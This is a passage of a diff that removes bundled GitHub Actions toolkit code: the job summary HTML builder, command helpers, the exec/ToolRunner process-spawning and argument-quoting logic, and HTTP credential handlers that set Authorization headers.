value : new P(function (resolve) { resolve(value); }); } - return new (P || (P = Promise))(function (resolve, reject) { - function fulfilled(value) { try { step(generator.next(value)); } catch (e) { reject(e); } } - function rejected(value) { try { step(generator["throw"](value)); } catch (e) { reject(e); } } - function step(result) { result.done ? resolve(result.value) : adopt(result.value).then(fulfilled, rejected); } - step((generator = generator.apply(thisArg, _arguments || [])).next()); - }); -}; -Object.defineProperty(exports, "__esModule", ({ value: true })); -exports.summary = exports.markdownSummary = exports.SUMMARY_DOCS_URL = exports.SUMMARY_ENV_VAR = void 0; -const os_1 = __nccwpck_require__(2037); -const fs_1 = __nccwpck_require__(7147); -const { access, appendFile, writeFile } = fs_1.promises; -exports.SUMMARY_ENV_VAR = 'GITHUB_STEP_SUMMARY'; -exports.SUMMARY_DOCS_URL = 'https://docs.github.com/actions/using-workflows/workflow-commands-for-github-actions#adding-a-job-summary'; -class Summary { - constructor() { - this._buffer = ''; - } - /** - * Finds the summary file path from the environment, rejects if env var is not found or file does not exist - * Also checks r/w permissions. - * - * @returns step summary file path - */ - filePath() { - return __awaiter(this, void 0, void 0, function* () { - if (this._filePath) { - return this._filePath; - } - const pathFromEnv = process.env[exports.SUMMARY_ENV_VAR]; - if (!pathFromEnv) { - throw new Error(`Unable to find environment variable for $${exports.SUMMARY_ENV_VAR}. Check if your runtime environment supports job summaries.`); - } - try { - yield access(pathFromEnv, fs_1.constants.R_OK | fs_1.constants.W_OK); - } - catch (_a) { - throw new Error(`Unable to access summary file: '${pathFromEnv}'. 
Check if the file has correct read/write permissions.`); - } - this._filePath = pathFromEnv; - return this._filePath; - }); - } - /** - * Wraps content in an HTML tag, adding any HTML attributes - * - * @param {string} tag HTML tag to wrap - * @param {string | null} content content within the tag - * @param {[attribute: string]: string} attrs key-value list of HTML attributes to add - * - * @returns {string} content wrapped in HTML element - */ - wrap(tag, content, attrs = {}) { - const htmlAttrs = Object.entries(attrs) - .map(([key, value]) => ` ${key}="${value}"`) - .join(''); - if (!content) { - return `<${tag}${htmlAttrs}>`; - } - return `<${tag}${htmlAttrs}>${content}`; - } - /** - * Writes text in the buffer to the summary buffer file and empties buffer. Will append by default. - * - * @param {SummaryWriteOptions} [options] (optional) options for write operation - * - * @returns {Promise

} summary instance - */ - write(options) { - return __awaiter(this, void 0, void 0, function* () { - const overwrite = !!(options === null || options === void 0 ? void 0 : options.overwrite); - const filePath = yield this.filePath(); - const writeFunc = overwrite ? writeFile : appendFile; - yield writeFunc(filePath, this._buffer, { encoding: 'utf8' }); - return this.emptyBuffer(); - }); - } - /** - * Clears the summary buffer and wipes the summary file - * - * @returns {Summary} summary instance - */ - clear() { - return __awaiter(this, void 0, void 0, function* () { - return this.emptyBuffer().write({ overwrite: true }); - }); - } - /** - * Returns the current summary buffer as a string - * - * @returns {string} string of summary buffer - */ - stringify() { - return this._buffer; - } - /** - * If the summary buffer is empty - * - * @returns {boolen} true if the buffer is empty - */ - isEmptyBuffer() { - return this._buffer.length === 0; - } - /** - * Resets the summary buffer without writing to summary file - * - * @returns {Summary} summary instance - */ - emptyBuffer() { - this._buffer = ''; - return this; - } - /** - * Adds raw text to the summary buffer - * - * @param {string} text content to add - * @param {boolean} [addEOL=false] (optional) append an EOL to the raw text (default: false) - * - * @returns {Summary} summary instance - */ - addRaw(text, addEOL = false) { - this._buffer += text; - return addEOL ? 
this.addEOL() : this; - } - /** - * Adds the operating system-specific end-of-line marker to the buffer - * - * @returns {Summary} summary instance - */ - addEOL() { - return this.addRaw(os_1.EOL); - } - /** - * Adds an HTML codeblock to the summary buffer - * - * @param {string} code content to render within fenced code block - * @param {string} lang (optional) language to syntax highlight code - * - * @returns {Summary} summary instance - */ - addCodeBlock(code, lang) { - const attrs = Object.assign({}, (lang && { lang })); - const element = this.wrap('pre', this.wrap('code', code), attrs); - return this.addRaw(element).addEOL(); - } - /** - * Adds an HTML list to the summary buffer - * - * @param {string[]} items list of items to render - * @param {boolean} [ordered=false] (optional) if the rendered list should be ordered or not (default: false) - * - * @returns {Summary} summary instance - */ - addList(items, ordered = false) { - const tag = ordered ? 'ol' : 'ul'; - const listItems = items.map(item => this.wrap('li', item)).join(''); - const element = this.wrap(tag, listItems); - return this.addRaw(element).addEOL(); - } - /** - * Adds an HTML table to the summary buffer - * - * @param {SummaryTableCell[]} rows table rows - * - * @returns {Summary} summary instance - */ - addTable(rows) { - const tableBody = rows - .map(row => { - const cells = row - .map(cell => { - if (typeof cell === 'string') { - return this.wrap('td', cell); - } - const { header, data, colspan, rowspan } = cell; - const tag = header ? 
'th' : 'td'; - const attrs = Object.assign(Object.assign({}, (colspan && { colspan })), (rowspan && { rowspan })); - return this.wrap(tag, data, attrs); - }) - .join(''); - return this.wrap('tr', cells); - }) - .join(''); - const element = this.wrap('table', tableBody); - return this.addRaw(element).addEOL(); - } - /** - * Adds a collapsable HTML details element to the summary buffer - * - * @param {string} label text for the closed state - * @param {string} content collapsable content - * - * @returns {Summary} summary instance - */ - addDetails(label, content) { - const element = this.wrap('details', this.wrap('summary', label) + content); - return this.addRaw(element).addEOL(); - } - /** - * Adds an HTML image tag to the summary buffer - * - * @param {string} src path to the image you to embed - * @param {string} alt text description of the image - * @param {SummaryImageOptions} options (optional) addition image attributes - * - * @returns {Summary} summary instance - */ - addImage(src, alt, options) { - const { width, height } = options || {}; - const attrs = Object.assign(Object.assign({}, (width && { width })), (height && { height })); - const element = this.wrap('img', null, Object.assign({ src, alt }, attrs)); - return this.addRaw(element).addEOL(); - } - /** - * Adds an HTML section heading element - * - * @param {string} text heading text - * @param {number | string} [level=1] (optional) the heading level, default: 1 - * - * @returns {Summary} summary instance - */ - addHeading(text, level) { - const tag = `h${level}`; - const allowedTag = ['h1', 'h2', 'h3', 'h4', 'h5', 'h6'].includes(tag) - ? tag - : 'h1'; - const element = this.wrap(allowedTag, text); - return this.addRaw(element).addEOL(); - } - /** - * Adds an HTML thematic break (
) to the summary buffer - * - * @returns {Summary} summary instance - */ - addSeparator() { - const element = this.wrap('hr', null); - return this.addRaw(element).addEOL(); - } - /** - * Adds an HTML line break (
) to the summary buffer - * - * @returns {Summary} summary instance - */ - addBreak() { - const element = this.wrap('br', null); - return this.addRaw(element).addEOL(); - } - /** - * Adds an HTML blockquote to the summary buffer - * - * @param {string} text quote text - * @param {string} cite (optional) citation url - * - * @returns {Summary} summary instance - */ - addQuote(text, cite) { - const attrs = Object.assign({}, (cite && { cite })); - const element = this.wrap('blockquote', text, attrs); - return this.addRaw(element).addEOL(); - } - /** - * Adds an HTML anchor tag to the summary buffer - * - * @param {string} text link text/content - * @param {string} href hyperlink - * - * @returns {Summary} summary instance - */ - addLink(text, href) { - const element = this.wrap('a', text, { href }); - return this.addRaw(element).addEOL(); - } -} -const _summary = new Summary(); -/** - * @deprecated use `core.summary` - */ -exports.markdownSummary = _summary; -exports.summary = _summary; -//# sourceMappingURL=summary.js.map - -/***/ }), - -/***/ 5278: -/***/ ((__unused_webpack_module, exports) => { - -"use strict"; - -// We use any as a valid input type -/* eslint-disable @typescript-eslint/no-explicit-any */ -Object.defineProperty(exports, "__esModule", ({ value: true })); -exports.toCommandProperties = exports.toCommandValue = void 0; -/** - * Sanitizes an input into a string so it can be passed into issueCommand safely - * @param input input to sanitize into a string - */ -function toCommandValue(input) { - if (input === null || input === undefined) { - return ''; - } - else if (typeof input === 'string' || input instanceof String) { - return input; - } - return JSON.stringify(input); -} -exports.toCommandValue = toCommandValue; -/** - * - * @param annotationProperties - * @returns The command properties to send with the actual annotation command - * See IssueCommandProperties: 
https://github.com/actions/runner/blob/main/src/Runner.Worker/ActionCommandManager.cs#L646 - */ -function toCommandProperties(annotationProperties) { - if (!Object.keys(annotationProperties).length) { - return {}; - } - return { - title: annotationProperties.title, - file: annotationProperties.file, - line: annotationProperties.startLine, - endLine: annotationProperties.endLine, - col: annotationProperties.startColumn, - endColumn: annotationProperties.endColumn - }; -} -exports.toCommandProperties = toCommandProperties; -//# sourceMappingURL=utils.js.map - -/***/ }), - -/***/ 1514: -/***/ (function(__unused_webpack_module, exports, __nccwpck_require__) { - -"use strict"; - -var __createBinding = (this && this.__createBinding) || (Object.create ? (function(o, m, k, k2) { - if (k2 === undefined) k2 = k; - Object.defineProperty(o, k2, { enumerable: true, get: function() { return m[k]; } }); -}) : (function(o, m, k, k2) { - if (k2 === undefined) k2 = k; - o[k2] = m[k]; -})); -var __setModuleDefault = (this && this.__setModuleDefault) || (Object.create ? (function(o, v) { - Object.defineProperty(o, "default", { enumerable: true, value: v }); -}) : function(o, v) { - o["default"] = v; -}); -var __importStar = (this && this.__importStar) || function (mod) { - if (mod && mod.__esModule) return mod; - var result = {}; - if (mod != null) for (var k in mod) if (k !== "default" && Object.hasOwnProperty.call(mod, k)) __createBinding(result, mod, k); - __setModuleDefault(result, mod); - return result; -}; -var __awaiter = (this && this.__awaiter) || function (thisArg, _arguments, P, generator) { - function adopt(value) { return value instanceof P ? 
value : new P(function (resolve) { resolve(value); }); } - return new (P || (P = Promise))(function (resolve, reject) { - function fulfilled(value) { try { step(generator.next(value)); } catch (e) { reject(e); } } - function rejected(value) { try { step(generator["throw"](value)); } catch (e) { reject(e); } } - function step(result) { result.done ? resolve(result.value) : adopt(result.value).then(fulfilled, rejected); } - step((generator = generator.apply(thisArg, _arguments || [])).next()); - }); -}; -Object.defineProperty(exports, "__esModule", ({ value: true })); -exports.getExecOutput = exports.exec = void 0; -const string_decoder_1 = __nccwpck_require__(1576); -const tr = __importStar(__nccwpck_require__(8159)); -/** - * Exec a command. - * Output will be streamed to the live console. - * Returns promise with return code - * - * @param commandLine command to execute (can include additional args). Must be correctly escaped. - * @param args optional arguments for tool. Escaping is handled by the lib. - * @param options optional exec options. See ExecOptions - * @returns Promise exit code - */ -function exec(commandLine, args, options) { - return __awaiter(this, void 0, void 0, function* () { - const commandArgs = tr.argStringToArray(commandLine); - if (commandArgs.length === 0) { - throw new Error(`Parameter 'commandLine' cannot be null or empty.`); - } - // Path to tool to execute should be first arg - const toolPath = commandArgs[0]; - args = commandArgs.slice(1).concat(args || []); - const runner = new tr.ToolRunner(toolPath, args, options); - return runner.exec(); - }); -} -exports.exec = exec; -/** - * Exec a command and get the output. - * Output will be streamed to the live console. - * Returns promise with the exit code and collected stdout and stderr - * - * @param commandLine command to execute (can include additional args). Must be correctly escaped. - * @param args optional arguments for tool. Escaping is handled by the lib. 
- * @param options optional exec options. See ExecOptions - * @returns Promise exit code, stdout, and stderr - */ -function getExecOutput(commandLine, args, options) { - var _a, _b; - return __awaiter(this, void 0, void 0, function* () { - let stdout = ''; - let stderr = ''; - //Using string decoder covers the case where a mult-byte character is split - const stdoutDecoder = new string_decoder_1.StringDecoder('utf8'); - const stderrDecoder = new string_decoder_1.StringDecoder('utf8'); - const originalStdoutListener = (_a = options === null || options === void 0 ? void 0 : options.listeners) === null || _a === void 0 ? void 0 : _a.stdout; - const originalStdErrListener = (_b = options === null || options === void 0 ? void 0 : options.listeners) === null || _b === void 0 ? void 0 : _b.stderr; - const stdErrListener = (data) => { - stderr += stderrDecoder.write(data); - if (originalStdErrListener) { - originalStdErrListener(data); - } - }; - const stdOutListener = (data) => { - stdout += stdoutDecoder.write(data); - if (originalStdoutListener) { - originalStdoutListener(data); - } - }; - const listeners = Object.assign(Object.assign({}, options === null || options === void 0 ? void 0 : options.listeners), { stdout: stdOutListener, stderr: stdErrListener }); - const exitCode = yield exec(commandLine, args, Object.assign(Object.assign({}, options), { listeners })); - //flush any remaining characters - stdout += stdoutDecoder.end(); - stderr += stderrDecoder.end(); - return { - exitCode, - stdout, - stderr - }; - }); -} -exports.getExecOutput = getExecOutput; -//# sourceMappingURL=exec.js.map - -/***/ }), - -/***/ 8159: -/***/ (function(__unused_webpack_module, exports, __nccwpck_require__) { - -"use strict"; - -var __createBinding = (this && this.__createBinding) || (Object.create ? 
(function(o, m, k, k2) { - if (k2 === undefined) k2 = k; - Object.defineProperty(o, k2, { enumerable: true, get: function() { return m[k]; } }); -}) : (function(o, m, k, k2) { - if (k2 === undefined) k2 = k; - o[k2] = m[k]; -})); -var __setModuleDefault = (this && this.__setModuleDefault) || (Object.create ? (function(o, v) { - Object.defineProperty(o, "default", { enumerable: true, value: v }); -}) : function(o, v) { - o["default"] = v; -}); -var __importStar = (this && this.__importStar) || function (mod) { - if (mod && mod.__esModule) return mod; - var result = {}; - if (mod != null) for (var k in mod) if (k !== "default" && Object.hasOwnProperty.call(mod, k)) __createBinding(result, mod, k); - __setModuleDefault(result, mod); - return result; -}; -var __awaiter = (this && this.__awaiter) || function (thisArg, _arguments, P, generator) { - function adopt(value) { return value instanceof P ? value : new P(function (resolve) { resolve(value); }); } - return new (P || (P = Promise))(function (resolve, reject) { - function fulfilled(value) { try { step(generator.next(value)); } catch (e) { reject(e); } } - function rejected(value) { try { step(generator["throw"](value)); } catch (e) { reject(e); } } - function step(result) { result.done ? 
resolve(result.value) : adopt(result.value).then(fulfilled, rejected); } - step((generator = generator.apply(thisArg, _arguments || [])).next()); - }); -}; -Object.defineProperty(exports, "__esModule", ({ value: true })); -exports.argStringToArray = exports.ToolRunner = void 0; -const os = __importStar(__nccwpck_require__(2037)); -const events = __importStar(__nccwpck_require__(2361)); -const child = __importStar(__nccwpck_require__(2081)); -const path = __importStar(__nccwpck_require__(1017)); -const io = __importStar(__nccwpck_require__(7436)); -const ioUtil = __importStar(__nccwpck_require__(1962)); -const timers_1 = __nccwpck_require__(9512); -/* eslint-disable @typescript-eslint/unbound-method */ -const IS_WINDOWS = process.platform === 'win32'; -/* - * Class for running command line tools. Handles quoting and arg parsing in a platform agnostic way. - */ -class ToolRunner extends events.EventEmitter { - constructor(toolPath, args, options) { - super(); - if (!toolPath) { - throw new Error("Parameter 'toolPath' cannot be null or empty."); - } - this.toolPath = toolPath; - this.args = args || []; - this.options = options || {}; - } - _debug(message) { - if (this.options.listeners && this.options.listeners.debug) { - this.options.listeners.debug(message); - } - } - _getCommandString(options, noPrefix) { - const toolPath = this._getSpawnFileName(); - const args = this._getSpawnArgs(options); - let cmd = noPrefix ? 
'' : '[command]'; // omit prefix when piped to a second tool - if (IS_WINDOWS) { - // Windows + cmd file - if (this._isCmdFile()) { - cmd += toolPath; - for (const a of args) { - cmd += ` ${a}`; - } - } - // Windows + verbatim - else if (options.windowsVerbatimArguments) { - cmd += `"${toolPath}"`; - for (const a of args) { - cmd += ` ${a}`; - } - } - // Windows (regular) - else { - cmd += this._windowsQuoteCmdArg(toolPath); - for (const a of args) { - cmd += ` ${this._windowsQuoteCmdArg(a)}`; - } - } - } - else { - // OSX/Linux - this can likely be improved with some form of quoting. - // creating processes on Unix is fundamentally different than Windows. - // on Unix, execvp() takes an arg array. - cmd += toolPath; - for (const a of args) { - cmd += ` ${a}`; - } - } - return cmd; - } - _processLineBuffer(data, strBuffer, onLine) { - try { - let s = strBuffer + data.toString(); - let n = s.indexOf(os.EOL); - while (n > -1) { - const line = s.substring(0, n); - onLine(line); - // the rest of the string ... - s = s.substring(n + os.EOL.length); - n = s.indexOf(os.EOL); - } - return s; - } - catch (err) { - // streaming lines to console is best effort. Don't fail a build. - this._debug(`error processing line. Failed with error ${err}`); - return ''; - } - } - _getSpawnFileName() { - if (IS_WINDOWS) { - if (this._isCmdFile()) { - return process.env['COMSPEC'] || 'cmd.exe'; - } - } - return this.toolPath; - } - _getSpawnArgs(options) { - if (IS_WINDOWS) { - if (this._isCmdFile()) { - let argline = `/D /S /C "${this._windowsQuoteCmdArg(this.toolPath)}`; - for (const a of this.args) { - argline += ' '; - argline += options.windowsVerbatimArguments - ? 
a - : this._windowsQuoteCmdArg(a); - } - argline += '"'; - return [argline]; - } - } - return this.args; - } - _endsWith(str, end) { - return str.endsWith(end); - } - _isCmdFile() { - const upperToolPath = this.toolPath.toUpperCase(); - return (this._endsWith(upperToolPath, '.CMD') || - this._endsWith(upperToolPath, '.BAT')); - } - _windowsQuoteCmdArg(arg) { - // for .exe, apply the normal quoting rules that libuv applies - if (!this._isCmdFile()) { - return this._uvQuoteCmdArg(arg); - } - // otherwise apply quoting rules specific to the cmd.exe command line parser. - // the libuv rules are generic and are not designed specifically for cmd.exe - // command line parser. - // - // for a detailed description of the cmd.exe command line parser, refer to - // http://stackoverflow.com/questions/4094699/how-does-the-windows-command-interpreter-cmd-exe-parse-scripts/7970912#7970912 - // need quotes for empty arg - if (!arg) { - return '""'; - } - // determine whether the arg needs to be quoted - const cmdSpecialChars = [ - ' ', - '\t', - '&', - '(', - ')', - '[', - ']', - '{', - '}', - '^', - '=', - ';', - '!', - "'", - '+', - ',', - '`', - '~', - '|', - '<', - '>', - '"' - ]; - let needsQuotes = false; - for (const char of arg) { - if (cmdSpecialChars.some(x => x === char)) { - needsQuotes = true; - break; - } - } - // short-circuit if quotes not needed - if (!needsQuotes) { - return arg; - } - // the following quoting rules are very similar to the rules that by libuv applies. - // - // 1) wrap the string in quotes - // - // 2) double-up quotes - i.e. " => "" - // - // this is different from the libuv quoting rules. libuv replaces " with \", which unfortunately - // doesn't work well with a cmd.exe command line. - // - // note, replacing " with "" also works well if the arg is passed to a downstream .NET console app. 
- // for example, the command line: - // foo.exe "myarg:""my val""" - // is parsed by a .NET console app into an arg array: - // [ "myarg:\"my val\"" ] - // which is the same end result when applying libuv quoting rules. although the actual - // command line from libuv quoting rules would look like: - // foo.exe "myarg:\"my val\"" - // - // 3) double-up slashes that precede a quote, - // e.g. hello \world => "hello \world" - // hello\"world => "hello\\""world" - // hello\\"world => "hello\\\\""world" - // hello world\ => "hello world\\" - // - // technically this is not required for a cmd.exe command line, or the batch argument parser. - // the reasons for including this as a .cmd quoting rule are: - // - // a) this is optimized for the scenario where the argument is passed from the .cmd file to an - // external program. many programs (e.g. .NET console apps) rely on the slash-doubling rule. - // - // b) it's what we've been doing previously (by deferring to node default behavior) and we - // haven't heard any complaints about that aspect. - // - // note, a weakness of the quoting rules chosen here, is that % is not escaped. in fact, % cannot be - // escaped when used on the command line directly - even though within a .cmd file % can be escaped - // by using %%. - // - // the saving grace is, on the command line, %var% is left as-is if var is not defined. this contrasts - // the line parsing rules within a .cmd file, where if var is not defined it is replaced with nothing. - // - // one option that was explored was replacing % with ^% - i.e. %var% => ^%var^%. this hack would - // often work, since it is unlikely that var^ would exist, and the ^ character is removed when the - // variable is used. the problem, however, is that ^ is not removed when %* is used to pass the args - // to an external program. - // - // an unexplored potential solution for the % escaping problem, is to create a wrapper .cmd file. - // % can be escaped within a .cmd file. 
- let reverse = '"'; - let quoteHit = true; - for (let i = arg.length; i > 0; i--) { - // walk the string in reverse - reverse += arg[i - 1]; - if (quoteHit && arg[i - 1] === '\\') { - reverse += '\\'; // double the slash - } - else if (arg[i - 1] === '"') { - quoteHit = true; - reverse += '"'; // double the quote - } - else { - quoteHit = false; - } - } - reverse += '"'; - return reverse - .split('') - .reverse() - .join(''); - } - _uvQuoteCmdArg(arg) { - // Tool runner wraps child_process.spawn() and needs to apply the same quoting as - // Node in certain cases where the undocumented spawn option windowsVerbatimArguments - // is used. - // - // Since this function is a port of quote_cmd_arg from Node 4.x (technically, lib UV, - // see https://github.com/nodejs/node/blob/v4.x/deps/uv/src/win/process.c for details), - // pasting copyright notice from Node within this function: - // - // Copyright Joyent, Inc. and other Node contributors. All rights reserved. - // - // Permission is hereby granted, free of charge, to any person obtaining a copy - // of this software and associated documentation files (the "Software"), to - // deal in the Software without restriction, including without limitation the - // rights to use, copy, modify, merge, publish, distribute, sublicense, and/or - // sell copies of the Software, and to permit persons to whom the Software is - // furnished to do so, subject to the following conditions: - // - // The above copyright notice and this permission notice shall be included in - // all copies or substantial portions of the Software. - // - // THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR - // IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, - // FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. 
IN NO EVENT SHALL THE - // AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER - // LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING - // FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS - // IN THE SOFTWARE. - if (!arg) { - // Need double quotation for empty argument - return '""'; - } - if (!arg.includes(' ') && !arg.includes('\t') && !arg.includes('"')) { - // No quotation needed - return arg; - } - if (!arg.includes('"') && !arg.includes('\\')) { - // No embedded double quotes or backslashes, so I can just wrap - // quote marks around the whole thing. - return `"${arg}"`; - } - // Expected input/output: - // input : hello"world - // output: "hello\"world" - // input : hello""world - // output: "hello\"\"world" - // input : hello\world - // output: hello\world - // input : hello\\world - // output: hello\\world - // input : hello\"world - // output: "hello\\\"world" - // input : hello\\"world - // output: "hello\\\\\"world" - // input : hello world\ - // output: "hello world\\" - note the comment in libuv actually reads "hello world\" - // but it appears the comment is wrong, it should be "hello world\\" - let reverse = '"'; - let quoteHit = true; - for (let i = arg.length; i > 0; i--) { - // walk the string in reverse - reverse += arg[i - 1]; - if (quoteHit && arg[i - 1] === '\\') { - reverse += '\\'; - } - else if (arg[i - 1] === '"') { - quoteHit = true; - reverse += '\\'; - } - else { - quoteHit = false; - } - } - reverse += '"'; - return reverse - .split('') - .reverse() - .join(''); - } - _cloneExecOptions(options) { - options = options || {}; - const result = { - cwd: options.cwd || process.cwd(), - env: options.env || process.env, - silent: options.silent || false, - windowsVerbatimArguments: options.windowsVerbatimArguments || false, - failOnStdErr: options.failOnStdErr || false, - ignoreReturnCode: options.ignoreReturnCode || false, - delay: options.delay || 10000 - }; - 
result.outStream = options.outStream || process.stdout; - result.errStream = options.errStream || process.stderr; - return result; - } - _getSpawnOptions(options, toolPath) { - options = options || {}; - const result = {}; - result.cwd = options.cwd; - result.env = options.env; - result['windowsVerbatimArguments'] = - options.windowsVerbatimArguments || this._isCmdFile(); - if (options.windowsVerbatimArguments) { - result.argv0 = `"${toolPath}"`; - } - return result; - } - /** - * Exec a tool. - * Output will be streamed to the live console. - * Returns promise with return code - * - * @param tool path to tool to exec - * @param options optional exec options. See ExecOptions - * @returns number - */ - exec() { - return __awaiter(this, void 0, void 0, function* () { - // root the tool path if it is unrooted and contains relative pathing - if (!ioUtil.isRooted(this.toolPath) && - (this.toolPath.includes('/') || - (IS_WINDOWS && this.toolPath.includes('\\')))) { - // prefer options.cwd if it is specified, however options.cwd may also need to be rooted - this.toolPath = path.resolve(process.cwd(), this.options.cwd || process.cwd(), this.toolPath); - } - // if the tool is only a file name, then resolve it from the PATH - // otherwise verify it exists (add extension on Windows if necessary) - this.toolPath = yield io.which(this.toolPath, true); - return new Promise((resolve, reject) => __awaiter(this, void 0, void 0, function* () { - this._debug(`exec tool: ${this.toolPath}`); - this._debug('arguments:'); - for (const arg of this.args) { - this._debug(` ${arg}`); - } - const optionsNonNull = this._cloneExecOptions(this.options); - if (!optionsNonNull.silent && optionsNonNull.outStream) { - optionsNonNull.outStream.write(this._getCommandString(optionsNonNull) + os.EOL); - } - const state = new ExecState(optionsNonNull, this.toolPath); - state.on('debug', (message) => { - this._debug(message); - }); - if (this.options.cwd && !(yield ioUtil.exists(this.options.cwd))) { - 
return reject(new Error(`The cwd: ${this.options.cwd} does not exist!`)); - } - const fileName = this._getSpawnFileName(); - const cp = child.spawn(fileName, this._getSpawnArgs(optionsNonNull), this._getSpawnOptions(this.options, fileName)); - let stdbuffer = ''; - if (cp.stdout) { - cp.stdout.on('data', (data) => { - if (this.options.listeners && this.options.listeners.stdout) { - this.options.listeners.stdout(data); - } - if (!optionsNonNull.silent && optionsNonNull.outStream) { - optionsNonNull.outStream.write(data); - } - stdbuffer = this._processLineBuffer(data, stdbuffer, (line) => { - if (this.options.listeners && this.options.listeners.stdline) { - this.options.listeners.stdline(line); - } - }); - }); - } - let errbuffer = ''; - if (cp.stderr) { - cp.stderr.on('data', (data) => { - state.processStderr = true; - if (this.options.listeners && this.options.listeners.stderr) { - this.options.listeners.stderr(data); - } - if (!optionsNonNull.silent && - optionsNonNull.errStream && - optionsNonNull.outStream) { - const s = optionsNonNull.failOnStdErr - ? 
optionsNonNull.errStream - : optionsNonNull.outStream; - s.write(data); - } - errbuffer = this._processLineBuffer(data, errbuffer, (line) => { - if (this.options.listeners && this.options.listeners.errline) { - this.options.listeners.errline(line); - } - }); - }); - } - cp.on('error', (err) => { - state.processError = err.message; - state.processExited = true; - state.processClosed = true; - state.CheckComplete(); - }); - cp.on('exit', (code) => { - state.processExitCode = code; - state.processExited = true; - this._debug(`Exit code ${code} received from tool '${this.toolPath}'`); - state.CheckComplete(); - }); - cp.on('close', (code) => { - state.processExitCode = code; - state.processExited = true; - state.processClosed = true; - this._debug(`STDIO streams have closed for tool '${this.toolPath}'`); - state.CheckComplete(); - }); - state.on('done', (error, exitCode) => { - if (stdbuffer.length > 0) { - this.emit('stdline', stdbuffer); - } - if (errbuffer.length > 0) { - this.emit('errline', errbuffer); - } - cp.removeAllListeners(); - if (error) { - reject(error); - } - else { - resolve(exitCode); - } - }); - if (this.options.input) { - if (!cp.stdin) { - throw new Error('child process missing stdin'); - } - cp.stdin.end(this.options.input); - } - })); - }); - } -} -exports.ToolRunner = ToolRunner; -/** - * Convert an arg string to an array of args. Handles escaping - * - * @param argString string of arguments - * @returns string[] array of arguments - */ -function argStringToArray(argString) { - const args = []; - let inQuotes = false; - let escaped = false; - let arg = ''; - function append(c) { - // we only escape double quotes. 
- if (escaped && c !== '"') { - arg += '\\'; - } - arg += c; - escaped = false; - } - for (let i = 0; i < argString.length; i++) { - const c = argString.charAt(i); - if (c === '"') { - if (!escaped) { - inQuotes = !inQuotes; - } - else { - append(c); - } - continue; - } - if (c === '\\' && escaped) { - append(c); - continue; - } - if (c === '\\' && inQuotes) { - escaped = true; - continue; - } - if (c === ' ' && !inQuotes) { - if (arg.length > 0) { - args.push(arg); - arg = ''; - } - continue; - } - append(c); - } - if (arg.length > 0) { - args.push(arg.trim()); - } - return args; -} -exports.argStringToArray = argStringToArray; -class ExecState extends events.EventEmitter { - constructor(options, toolPath) { - super(); - this.processClosed = false; // tracks whether the process has exited and stdio is closed - this.processError = ''; - this.processExitCode = 0; - this.processExited = false; // tracks whether the process has exited - this.processStderr = false; // tracks whether stderr was written to - this.delay = 10000; // 10 seconds - this.done = false; - this.timeout = null; - if (!toolPath) { - throw new Error('toolPath must not be empty'); - } - this.options = options; - this.toolPath = toolPath; - if (options.delay) { - this.delay = options.delay; - } - } - CheckComplete() { - if (this.done) { - return; - } - if (this.processClosed) { - this._setResult(); - } - else if (this.processExited) { - this.timeout = timers_1.setTimeout(ExecState.HandleTimeout, this.delay, this); - } - } - _debug(message) { - this.emit('debug', message); - } - _setResult() { - // determine whether there is an error - let error; - if (this.processExited) { - if (this.processError) { - error = new Error(`There was an error when attempting to execute the process '${this.toolPath}'. This may indicate the process failed to start. 
Error: ${this.processError}`); - } - else if (this.processExitCode !== 0 && !this.options.ignoreReturnCode) { - error = new Error(`The process '${this.toolPath}' failed with exit code ${this.processExitCode}`); - } - else if (this.processStderr && this.options.failOnStdErr) { - error = new Error(`The process '${this.toolPath}' failed because one or more lines were written to the STDERR stream`); - } - } - // clear the timeout - if (this.timeout) { - clearTimeout(this.timeout); - this.timeout = null; - } - this.done = true; - this.emit('done', error, this.processExitCode); - } - static HandleTimeout(state) { - if (state.done) { - return; - } - if (!state.processClosed && state.processExited) { - const message = `The STDIO streams did not close within ${state.delay / - 1000} seconds of the exit event from process '${state.toolPath}'. This may indicate a child process inherited the STDIO streams and has not yet exited.`; - state._debug(message); - } - state._setResult(); - } -} -//# sourceMappingURL=toolrunner.js.map - -/***/ }), - -/***/ 5526: -/***/ (function(__unused_webpack_module, exports) { - -"use strict"; - -var __awaiter = (this && this.__awaiter) || function (thisArg, _arguments, P, generator) { - function adopt(value) { return value instanceof P ? value : new P(function (resolve) { resolve(value); }); } - return new (P || (P = Promise))(function (resolve, reject) { - function fulfilled(value) { try { step(generator.next(value)); } catch (e) { reject(e); } } - function rejected(value) { try { step(generator["throw"](value)); } catch (e) { reject(e); } } - function step(result) { result.done ? 
resolve(result.value) : adopt(result.value).then(fulfilled, rejected); } - step((generator = generator.apply(thisArg, _arguments || [])).next()); - }); -}; -Object.defineProperty(exports, "__esModule", ({ value: true })); -exports.PersonalAccessTokenCredentialHandler = exports.BearerCredentialHandler = exports.BasicCredentialHandler = void 0; -class BasicCredentialHandler { - constructor(username, password) { - this.username = username; - this.password = password; - } - prepareRequest(options) { - if (!options.headers) { - throw Error('The request has no headers'); - } - options.headers['Authorization'] = `Basic ${Buffer.from(`${this.username}:${this.password}`).toString('base64')}`; - } - // This handler cannot handle 401 - canHandleAuthentication() { - return false; - } - handleAuthentication() { - return __awaiter(this, void 0, void 0, function* () { - throw new Error('not implemented'); - }); - } -} -exports.BasicCredentialHandler = BasicCredentialHandler; -class BearerCredentialHandler { - constructor(token) { - this.token = token; - } - // currently implements pre-authorization - // TODO: support preAuth = false where it hooks on 401 - prepareRequest(options) { - if (!options.headers) { - throw Error('The request has no headers'); - } - options.headers['Authorization'] = `Bearer ${this.token}`; - } - // This handler cannot handle 401 - canHandleAuthentication() { - return false; - } - handleAuthentication() { - return __awaiter(this, void 0, void 0, function* () { - throw new Error('not implemented'); - }); - } -} -exports.BearerCredentialHandler = BearerCredentialHandler; -class PersonalAccessTokenCredentialHandler { - constructor(token) { - this.token = token; - } - // currently implements pre-authorization - // TODO: support preAuth = false where it hooks on 401 - prepareRequest(options) { - if (!options.headers) { - throw Error('The request has no headers'); - } - options.headers['Authorization'] = `Basic 
